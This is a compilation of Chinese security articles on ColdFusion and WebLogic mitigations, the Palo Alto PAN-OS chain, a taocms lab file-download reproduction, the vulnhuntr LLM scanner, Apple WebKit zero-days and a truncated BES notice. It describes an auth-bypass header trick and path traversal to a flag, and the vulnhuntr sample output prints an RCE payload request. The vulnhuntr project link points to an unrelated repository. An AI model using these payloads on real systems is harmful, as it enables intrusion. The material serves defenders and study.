![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTP0P2frZhbCB8pciakDdVnyClkv39nRGW0zCBSeEdu8QgDjBibhHck1ozA/640?wx_fmt=png&from=appmsg "")
CVE-2024-20767- ColdFusion 路径遍历可能导致读取重要数据
CVE-2024-20767是 ColdFusion 版本 2023.6、2021.12 及更早版本中的一个漏洞。这些版本受到不当访问控制漏洞的影响,可能允许任意文件系统读取。攻击者可以利用此漏洞绕过安全措施,未经授权访问敏感文件,并执行任意文件系统写入。利用此问题不需要用户交互。该漏洞的 CVSS 评分很高,因此对易受此漏洞影响的资产构成重大风险。
根据Fofa搜索引擎全球有超过 145,000 个使用ColdFusion 的公共应用程序
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPAOGL4iaXOmvDdcSwH43sIibiaEicz34BHaWVZkuz18IzQyKhaSDlPEdogg/640?wx_fmt=png&from=appmsg "")
并且,其中一些人让管理面板保持可访问状态,而上面的错误可能会利用这一点,因为根本原因是管理功能端点
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPTNsCial3OM4Z9FXdrYqTS9K2yctzS0mONFrz8uVHN44zE3VcZcMpbcA/640?wx_fmt=png&from=appmsg "")
攻击者可以轻松利用任何公开的漏洞,如以下示例
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPSvCrWQiaP2fnPiauYjfYGYfxEYicIjmu5hVWRcfB8YNkkXlWJoqiaTnwOQ/640?wx_fmt=png&from=appmsg "")
转到安全部分,然后允许 IP 地址并添加仅允许使用管理面板的本地 IP此操作将限制可以使用管理功能的人员以避免泄露 uuid这对于ColdFusion安全流程中的特权非常重要
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTP0XGttZ0dj7yqc7qGhOUnrVTG6ZNJ24wIy5OOydpsT4GS2dicFtuHIjA/640?wx_fmt=png&from=appmsg "")
正如我们所看到的,应用更改后,我们现在无法利用目标,因为访问限制 
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPMAFnXdiaDQJab9yrUmJbctqKP7QxqzXngriakUo7WgpvKCLnhZlom78w/640?wx_fmt=png&from=appmsg "")
CVE-2024-21216 Weblogic 未经身份验证的 RCE
CVE-2024-21216是 Oracle Fusion Middleware组件Core的 Oracle WebLogic Server 产品中的一个漏洞。受影响的受支持版本包括 12.2.1.4.0 和 14.1.1.0.0。这个易于利用的漏洞允许未经身份验证的攻击者通过T3和IIOP获得网络访问权限从而入侵 Oracle WebLogic Server。成功利用此漏洞可导致 Oracle WebLogic Server 被接管。CVSS 基本评分为 9.8,非常严重。
PoC 尚未发布但为了避免WebLogic服务器被接管如下图所示Nmap 扫描附带了一个 Weblogic 版本
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPorKKMk0m9ygsYvCFnkCjdVf7r32qLXHcRwWlXpKRsUxwzNFYo3OWTQ/640?wx_fmt=png&from=appmsg "")
要管理网络连接我们需要使用weblogic.security.net.ConnectionFilterImpl 来过滤对 T3 的访问
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPKKsltibfy3ibaGib57vafhfKxOxULV08px13U5Ykn4CP5E9Ah5oW4ABOQ/640?wx_fmt=png&from=appmsg "")
通过根据环境应用以下网络规则它将限制对公共连接的访问以访问T3协议以避免受到攻击
127.0.0.1 * * allow t3 t3s # 允许从本地主机访问 T3/T3s
<local_IP> * * allow t3 t3s # 允许从本地 IP 进行 T3/T3s 访问
<allowed_IP> * * allow t3 t3s # 允许来自特定受信任 IP 的 T3/T3s 访问
* * * 拒绝 t3 t3s # 拒绝所有其他 T3/T3s 访问
要禁用IIOP请转到服务器然后转到AdminServeradmin配置
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTP2Lo1cHfBaMsecicWKqPaIfwuXRfRYC2DRdZBqvRl4Caf51kbFlia6Law/640?wx_fmt=png&from=appmsg "")
然后转到“协议”选择“IIOP” ,然后取消选中“启用 IIOP”以禁用此协议
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPmiaBQN1YgLGSpl2FoWQJaq2yQad4IiaLBCGLBomclwCDVoS6MW0E5J3g/640?wx_fmt=png&from=appmsg "")
然后通过运行./StopWeblogic.sh保存并重新启动 Weblogic然后使用./StartWeblogic.sh重新启动它
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPzEOz1Pb753ghTu76MtN76HM0ECBQzLgicNlIcmuUIrnMVb29Poehkog/640?wx_fmt=png&from=appmsg "")
再次运行 Nmap 扫描结果显示握手失败这是由于T3协议 的限制
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPsMpwGuBCZf6JicSsBQvZNqrNy3QRxaQnKnicJ6bCWC71Pl4jbaR88OrA/640?wx_fmt=png&from=appmsg "")
**推荐**
始终建议应用官方补丁。然而,在大型环境中,立即应用补丁可能不可行。在这篇博文中,我们的目标是手动限制漏洞风险,而不修补应用程序。请记住,这些缓解措施可能会限制访问并禁用应用程序中的某些功能
**参考**
https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
https://docs.oracle.com/middleware/11119/wls/WLAPI/weblogic/security/net/ConnectionFilterImpl.html
感谢您抽出
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "")
来阅读本文
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "")
**点它,分享点赞在看都在这里**

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,109 @@
# Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的
原创 Lucian Constanti 信息安全D1net 2024-11-20 08:52
点击上方“**蓝色字体**”,选择 “**设为星标**”
关键讯息D1时间送达
Palo Alto Networks防火墙近期被发现存在两个严重漏洞攻击者可利用这两个漏洞组合通过PAN-OS管理Web界面绕过身份验证并提升权限最终获得root权限完全控制设备。第一个漏洞CVE-2024-0012允许攻击者绕过身份验证第二个漏洞CVE-2024-9474则是一个命令注入漏洞可提升权限至root。目前Palo Alto已发布修复程序并建议管理员更新防火墙版本同时限制管理界面访问权限。安全公司watchTowr的研究人员指出这些漏洞源于开发过程中的基本错误并提醒将PAN-OS管理界面暴露在互联网上极为危险。
攻击者正在利用两个漏洞的组合通过PAN-OS管理Web界面绕过身份验证并提升权限从而在Palo Alto Networks防火墙上获得root权限。
Palo Alto Networks已为其防火墙和虚拟安全设备发布了两个正在被积极利用的漏洞的修复程序。当这两个漏洞同时存在时攻击者可以在底层的PAN-OS操作系统上以最高权限执行恶意代码从而完全控制设备。
Palo Alto本月早些时候发布了一份咨询报告警告客户其正在调查有关PAN-OS基于Web的管理界面中存在潜在远程代码执行(RCE)漏洞的报告,并建议客户遵循推荐的步骤来确保对该界面的安全访问。
在调查过程中该公司发现这次RCE攻击并非由单一漏洞导致而是由两个漏洞共同造成。这两个漏洞都已在针对管理界面暴露在互联网上的设备的有限攻击中被利用。
**身份验证绕过和权限提升**
第一个漏洞(CVE-2024-0012)被评为严重级别评分为10分中的9.3分。通过利用此漏洞,攻击者可以绕过身份验证并获得管理界面的管理权限,从而执行管理操作并更改配置。
尽管这已经很糟糕,但它并不会直接导致整个系统被攻陷,除非这一功能能被用来在底层操作系统上执行恶意代码。
事实证明,攻击者通过第二个漏洞(CVE-2024-9474)找到了这样一种方法该漏洞允许任何拥有Web界面管理权限的人以root身份(即最高权限)在基于Linux的操作系统上执行代码。
这两个漏洞均影响PAN-OS 10.2、PAN-OS 11.0、PAN-OS 11.1和PAN-OS 11.2版本,目前这些版本都已获得补丁。
**漏洞源于疏忽**
来自安全公司watchTowr的研究人员对Palo Alto的补丁进行了逆向工程以分析这两个漏洞并得出结论认为这些漏洞是开发过程中基本错误的结果。
为了验证用户访问页面是否需要身份验证PAN OS管理界面会检查请求的X-Pan-Authcheck标头是否设置为on或off。将请求转发到托管Web应用的Apache服务器的Nginx代理服务器会根据请求的路由自动将X-Pan-Authcheck设置为on。在某些情况下由于位置(例如/unauth/目录)应无需身份验证即可访问因此X-Pan-Authcheck被设置为off但除了/unauth/之外几乎所有其他位置都应将该标头设置为on这应导致用户被重定向到登录页面。
然而watchTowr研究人员发现一个名为uiEnvSetup.php的重定向脚本期望HTTP_X_PAN_AUTHCHECK的值被设置为off如果请求中提供了这个值服务器就会接受它。
“我们只需……在X-PAN-AUTHCHECK HTTP请求标头中提供off值服务器就会贴心地关闭身份验证?!”研究人员在报告中写道,“到了这一步,还有谁会感到惊讶呢?”
第二个漏洞同样源于疏忽它是一个命令注入漏洞允许将shell命令作为用户名传递给名为AuditLog.write()的函数然后该函数将注入的命令传递给pexecute()。但根据研究人员的说法,传递给这个日志函数的负载实际上是另一个功能的结果,而这个功能本身也相当可怕。
该功能允许Palo Alto Panorama设备指定其希望模拟的用户和用户角色然后无需提供密码或通过双因素身份验证即可为其获得完全认证的PHP会话ID。
综上所述由于这种软件设计攻击者可以将shell负载作为用户名字段的一部分来模拟特定用户和角色然后该负载将被传递给AuditLog.write()接着传递给pexecute(),最终在底层操作系统上执行。
“令人惊讶的是这两个漏洞竟然出现在生产设备中更令人惊讶的是它们竟然通过Palo Alto设备底层潜伏的大量shell脚本调用而被允许存在”研究人员在分析中写道。
**缓解措施**
除了将受影响的防火墙更新到最新发布的版本外管理员还应将管理界面的访问权限限制为仅受信任的内部IP地址。管理界面也可以被隔离在专用的管理VLAN上或者可以配置为通过所谓的跳转服务器访问这些服务器需要先进行单独的身份验证。
将PAN-OS管理界面暴露在互联网上是非常危险的因为这不是在此类设备中发现的第一个也不太可能是最后一个RCE漏洞。今年早些时候Palo Alto Networks修补了PAN-OS中的一个零日RCE漏洞(CVE-2024-3400),该漏洞被国家支持的黑客组织利用过。
Palo Alto Networks的威胁追踪团队正在追踪CVE-2024-0012和CVE-2024-9474的利用活动并将其命名为Operation Lunar Peak同时发布了与之相关的入侵指标。
“这次活动主要源自已知为匿名VPN服务代理/隧道流量的IP地址”该团队表示“观察到的后利用活动包括交互式命令执行和在防火墙上投放恶意软件如Webshell。”
版权声明本文为企业网D1Net编译转载需在文章开头注明出处为企业网D1Net如果不注明出处企业网D1Net将保留追究其法律责任的权利。
![](https://mmbiz.qpic.cn/mmbiz_gif/tkEdnxs9SCm4omlQHkJibq3BQ31wdl2LzWkk2OtH0W7KKy9NeMGnKOa4wiabH53URyyFcsibKw0YFC5NankuuMcOg/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
**2024全国甲方IT选型大会 将于11月29-30日在南京盛大召开欢迎您扫描下方二维码报名↓↓↓。**
****
![](https://mmbiz.qpic.cn/mmbiz_jpg/01wTAnj9dLfp8QeodicQHA40MuBz8OpZZ7beuE15HFoWGkclGvFicXOBoo0Cfx6fWvVOd5npj5NaE9fNBVnU2YKw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
来源企业网D1Net
**关于企业网D1net(www.d1net.com)**
国内主流的to B IT门户同时在运营国内最大的甲方CIO专家库和智力输出及社交平台-信众智(www.cioall.com)。旗下运营19个IT行业公众号(
微信搜索D1net即可关注)
如果您在企业IT、网络、通信行业的某一领域工作并希望分享观点欢迎给企业网D1Net投稿。
封面图片来源于摄图网
**投稿邮箱:**
editor@d1net.com
**合作电话:**
010-58221588北京公司
021-51701588上海公司 
**合作邮箱:**
Sales@d1net.com
企业网D1net旗下信众智是CIO首席信息官的专家库和智力输出及资源分享平台有五万多CIO专家也是目前最大的CIO社交平台。
信众智对接CIO为CIO服务提供数字化升级转型方面的咨询、培训、需求对接等落地实战的服务。也是国内最早的toB共享经济平台。同时提供猎头选型点评IT部门业绩宣传等服务。
**扫描 “**
**二维码**
**” 可以查看更多详情**
![](https://mmbiz.qpic.cn/mmbiz_png/OuQdh6iaViaXaIOY0mjrTgicElErUqymD4icjEneq6YYVpiadU3pDLRHwqFrW9Y2Ht0uKeuIEjO3hDxfiatbI5KcibHIA/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,30 @@
# taocms 3.0.1 本地文件泄露漏洞CVE-2021-44983
原创 張童學 Nick安全 2024-11-20 07:54
### 0x01、漏洞环境
1、春秋云境
http://eci-2zecoe6tugruhx5kvq29.cloudeci1.ichunqiu.com:80
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF90662KfbKpU2URico3UaicC9tibJ8xXVhtRiahvXY1MLxEbNjYfl4n2gHSGchA/640?wx_fmt=png&from=appmsg "")
### 0x02、漏洞介绍
1、taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞。
### 0x03、漏洞复现
1、点击管理跳转到后台界面。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF9066jIRxaRKecueu7oqHuCY70fr2WLb0HxNCC3lj6g2MRs5SWmTUhvJZzw/640?wx_fmt=png&from=appmsg "")
2、查看管理界面源码存在弱口令。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF9066LYGxHITfQv1CyGYKiacjRelib3RAIzsYBndVlOm0441yuXicj5U1odsWw/640?wx_fmt=png&from=appmsg "")
3、打开文件管理访问../../../下载flag
![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF9066oRkgPPcQdQKbGqBM2I8K8A43QvV25pKFibq6rJ6iclCd9UBSV33icARZA/640?wx_fmt=png&from=appmsg "")
### 0x04、修复建议
1、为了防止这种攻击建议升级到Taocms最新版本或者对系统进行安全加固例如限制文件下载权限设置文件下载白名单等。同时对于所有用户来说密码安全也是非常重要的强烈建议定期更换复杂且不易被猜测的密码。

View File

@ -0,0 +1,314 @@
# vulnhuntr基于大语言模型和静态代码分析的漏洞扫描与分析工具
Alpha_h4ck FreeBuf 2024-11-20 11:27
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
**关于vulnhuntr**
## vulnhuntr是一款基于大语言模型和静态代码分析的安全漏洞扫描与分析工具该工具可以算得上是世界上首款具备自主AI能力的安全漏洞扫描工具。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38ov3d9VSRwd5RjPw2H7uhHIVyyIG7Mg3JcjcfGqibqOcH9iaRjHmWicuEZV1tdABRVQzsicXmicxaNXRA/640?wx_fmt=jpeg&from=appmsg "")
Vulnhuntr 利用 LLM 的强大功能自动创建和分析整个代码调用链,从远程用户输入开始,到服务器输出结束,以检测复杂的、多步骤的和严重影响安全的漏洞,而这些漏洞,远远超出了传统静态代码分析工具的能力。
##
**功能介绍**
##
当前版本的vulnhuntr支持检测和识别以下漏洞类别
> 1、本地文件包含LFI
> 2、任意文件覆盖AFO
> 3、远程代码执行RCE
> 4、跨站点脚本XSS
> 5、SQL 注入SQLI
> 6、服务器端请求伪造SSRF
> 7、不安全的直接对象引用IDOR
##
**工具执行逻辑**
##
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38ov3d9VSRwd5RjPw2H7uhHJ5lBnhFnvgqtu2GjTdP4fMEDeH6f4THJctJW2W1VaL4oMU10QVfpNA/640?wx_fmt=jpeg&from=appmsg "")
##
**工具要求**
##
> Python v3.10
##
**工具安装**
##
由于该工具基于Python 3.10开发因此我们首先需要在本地设备上安装并配置好Python 3.10环境。我们建议使用pipx或 Docker 轻松安装和运行 Vulnhuntr。
###
### Docker安装
```
```
```
docker build -t vulnhuntr https://github.com/protectai/vulnhuntr.git#main
```
```
```
### pipx安装
```
```
```
pipx install git+https://github.com/protectai/vulnhuntr.git --python python3.10
```
```
```
### 源码安装
****```
```
```
git clone https://github.com/protectai/vulnhuntr
cd vulnhuntr && poetry install
```
```
```
**工具使用**
```
```
```
usage: vulnhuntr [-h] -r ROOT [-a ANALYZE] [-l {claude,gpt,ollama}] [-v]
Analyze a GitHub project for vulnerabilities. Export your ANTHROPIC_API_KEY/OPENAI_API_KEY before running.
options:
-h, --help 显示工具帮助信息和退出
-r ROOT, --root ROOT 项目根目录的路径
-a ANALYZE, --analyze ANALYZE
项目中要分析的特定路径或文件
-l {claude,gpt,ollama}, --llm {claude,gpt,ollama}
要使用的LLM客户端默认claude
-v, --verbosity 增加输出的详细程度(-v表示INFO-vv表示DEBUG
```
```
```
**工具运行演示**
## 使用 Claude 分析整个存储库:
```
export ANTHROPIC_API_KEY="sk-1234"
vulnhuntr -r /path/to/target/repo/
```
使用 GPT-4o 分析文件,也可以指定子目录而不是文件:
```
export OPENAI_API_KEY="sk-1234"
vulnhuntr -r /path/to/target/repo/ -a server.py -l gpt
```
使用 Claude 和自定义端点运行来分析 /local/path/to/target/repo/repo-subfolder/target-file.py
```
```
```
docker run --rm -e ANTHROPIC_API_KEY=sk-1234 -e ANTHROPIC_BASE_URL=https://localhost:1234/api -v /local/path/to/target/repo:/repo vulnhuntr:latest -r /repo -a repo-subfolder/target-file.py
```
```
```
### 输出样例
```
scratchpad:
Analyzing the add_llm function in llm_app.py. 2. Identified user input used as keys to access dictionaries: EmbeddingModel, ChatModel, RerankModel,
CvModel, and TTSModel. 3. These dictionaries contain class references, which are instantiated with user-supplied parameters. 4. The factory variable is
directly used from user input (req['llm_factory']) without proper validation. 5. The llm_name is also derived from user input in most cases. 6. The
instantiation of these classes occurs in try-except blocks, but exceptions are only used for error messages, not preventing execution. 7. The api_key
and other sensitive information are passed directly to these instantiated classes. 8. There's no comprehensive input validation or sanitization for the
factory or llm_name variables. 9. The vulnerability is in a route decorated with @login_required, indicating it's accessible to authenticated users. 10.
Reviewing the EmbeddingModel, ChatModel, RerankModel, CvModel, and TTSModel dictionaries to understand their contents and potential for exploitation.
----------------------------------------
analysis:
The add_llm function in llm_app.py contains a critical Remote Code Execution (RCE) vulnerability. The function uses user-supplied input
(req['llm_factory'] and req['llm_name']) to dynamically instantiate classes from the EmbeddingModel, ChatModel, RerankModel, CvModel, and TTSModel
dictionaries. This pattern of using user input as a key to access and instantiate classes is inherently dangerous, as it allows an attacker to
potentially execute arbitrary code. The vulnerability is exacerbated by the lack of comprehensive input validation or sanitization on these
user-supplied values. While there are some checks for specific factory types, they are not exhaustive and can be bypassed. An attacker could potentially
provide a malicious value for 'llm_factory' that, when used as an index to these model dictionaries, results in the execution of arbitrary code. The
vulnerability is particularly severe because it occurs in a route decorated with @login_required, suggesting it's accessible to authenticated users,
which might give a false sense of security.
----------------------------------------
poc:
POST /add_llm HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer <valid_token>
{
"llm_factory": "__import__('os').system",
"llm_name": "id",
"model_type": "EMBEDDING",
"api_key": "dummy_key"
}
This payload attempts to exploit the vulnerability by setting 'llm_factory' to a string that, when evaluated, imports the os module and calls system.
The 'llm_name' is set to 'id', which would be executed as a system command if the exploit is successful.
----------------------------------------
confidence_score:
8
----------------------------------------
vulnerability_types:
- RCE
----------------------------------------
```
##
**许可证协议**
##
本项目的开发与发布遵循
AGPL-3.0
开源许可协议。
##
**项目地址**
##
**vulnhuntr**
https://github.com/daniel2005d/mapXplore
FreeBuf粉丝交流群招新啦
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://protectai.com/threat-research/vulnhuntr-first-0-day-vulnerabilities
> https://huntr.com/
>
>
>
>
>
>
>
>
>
>
>
>
>
>
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")

View File

@ -0,0 +1,91 @@
# 【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击
安全圈 2024-11-20 11:00
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgOvEXHviaXu1fO2nLov9bZ055v7s8F6w1DD1I0bx2h3zaOx0Mibd5CngBwwj2nTeEbupw7xpBsx27Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**关键词**
安全漏洞
苹果本周发布安全公告宣布对 WebKit 引擎的两处高危安全漏洞进行修复,值得注意的是这些漏洞在修复前已经遭到黑客的积极利用,因此属于零日漏洞的范畴。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGyliaCTwNPicbduqUHbw6glwC074kfIV3LkvOFo0dLmNicC5OE61BKc4ekicWS9DOqyPul41A6m6bulVLjg/640?wx_fmt=png&from=appmsg "")
**CVE-2024-44308**
黑客可以通过特制的 Web 内容导致任意代码执行,苹果获得的报告称该漏洞可能已经在基于 Intel 的 Mac 系统上被积极利用。
**CVE-2024-44309**
黑客可以通过特制的 Web 内容导致跨站脚本攻击,苹果获得的报告称该漏洞可能已经在基于 Intel 的 Mac 系统上被积极利用。
值得注意的是以上漏洞也在 iOS 和 iPadOS 中存在,因此苹果还发布了 iOS 18.1.1 和 iPadOS 18.1.1 版进行修复,不过暂时没有证据表明黑客也在 iOS 和 iPadOS 平台进行攻击。
发现并向苹果提交漏洞报告的是谷歌威胁分析小组的 Clément Lecigne 和 Benoît Sevens其中 Clément Lecigne 提交的漏洞通常都是遭到黑客利用的,或者说直接点说这名研究人员发现的漏洞通常都是由国家级黑客利用的。
这类漏洞只会针对某些具有极高价值目标的用户发起攻击,这也是为什么苹果会在 iOS 中增加高级保护模式的原因,在这个模式下 JavaScript 脚本都会被禁止运行 (本次提到的两个漏洞就有一个是 JavaScript Core 中的问题)。
来源https://www.landiannews.com/archives/106713.html
  END  
阅读推荐
[【安全圈】2024全球最弱密码排名揭晓“123456”再度登顶你的密码安全吗](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=1&sn=4670155de7d2f2afaa5fe30fda0bb2b0&chksm=f36e7d62c419f4745f1e8bba109c904e5aeda0df116d0348b08c58ebc5650933dc2d88c24c2c&scene=21#wechat_redirect)
[【安全圈】谷歌Gemini AI 聊天机器人不断让用户“去死”](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=2&sn=690f569a72493488bb3ecd0770623b7e&chksm=f36e7d62c419f474675d76068180a0f3bdb5172cff33e5038437f76753bc0a27164756b87d36&scene=21#wechat_redirect)
[【安全圈】美国饮用水系统存在300多个漏洞影响1.1亿人](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=3&sn=45c8dff3a066a1615c872523d972e645&chksm=f36e7d62c419f474a8053972dd9c71ee6170c6482642d86218c62a4788ba6c3240875f3d16fb&scene=21#wechat_redirect)
[【安全圈】VMware vCenter Server远程代码执行漏洞正被黑客广泛利用](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=4&sn=c7244d3c2cda936e8c968cf0a2ade6d0&chksm=f36e7d62c419f474201413fc6e1edcc5c024cfb6fa12a9adf16b49526e98689324bb9aa57fd0&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")
![](https://mmbiz.qpic.cn/mmbiz_png/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEDQIyPYpjfp0XDaaKjeaU6YdFae1iagIvFmFb4djeiahnUy2jBnxkMbaw/640?wx_fmt=png "")
**安全圈**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")
←扫码关注我们
**网罗圈内热点 专注网络安全**
**实时资讯一手掌握!**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")
**好看你就分享 有用就点个赞**
**支持「****安全圈」就点个三连吧!**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")

View File

@ -0,0 +1,63 @@
# 【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞
长亭安全应急响应中心 2024-11-20 09:12
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/FOh11C4BDicRHecpOMm11jyacnwmf34dic0PmOs5sHcM0VdwWWUcyVCRrJ1menJtq7sm5mQ1gWMe6eegYURia1XKw/640?wx_fmt=jpeg&from=appmsg "")
宝兰德BES应用服务器BESAppServer是一款遵循JavaEE和JakartaEE规范的企业级中间件提供Web容器、EJB容器、JMS容器、事务服务、JNDI服务等关键组件为企业级应用提供稳定、安全、高效的运行平台。2024年11月宝兰德官方发布安全补丁修复了一个反序列化漏洞。该漏洞无需认证即可被攻击者利用建议受影响的用户尽快修复此漏洞。
**漏洞描述**
 
Description 
**0****1**
